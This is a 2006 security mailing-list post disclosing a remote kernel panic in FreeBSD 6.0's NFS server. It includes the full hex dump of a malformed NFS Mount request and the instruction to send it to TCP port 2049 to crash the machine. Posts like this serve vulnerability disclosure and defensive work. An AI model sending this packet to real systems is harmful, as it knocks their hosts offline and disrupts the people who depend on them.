[Dailydave] fun with FreeBSD kernel

Evgeny Legerov admin at gleg.net
Sun Feb 26 11:10:42 EST 2006


Hi,

ProtoVer NFS testsuite 1.0 uncovered remote kernel panic vulnerability in FreeBSD 6.0 kernel.

The hex dump of NFS Mount request:
"""
 80 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02
 00 01 86 a5 00 00 00 01 00 00 00 01 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04
 2f 74 6d 70
"""

To trigger the bug, send the above request to 2049 TCP port
of a FreeBSD machine running nfsd.

FreeBSD team has been notified more than two weeks ago.

Regards,
Evgeny Legerov
www.gleg.net


More information about the Dailydave mailing list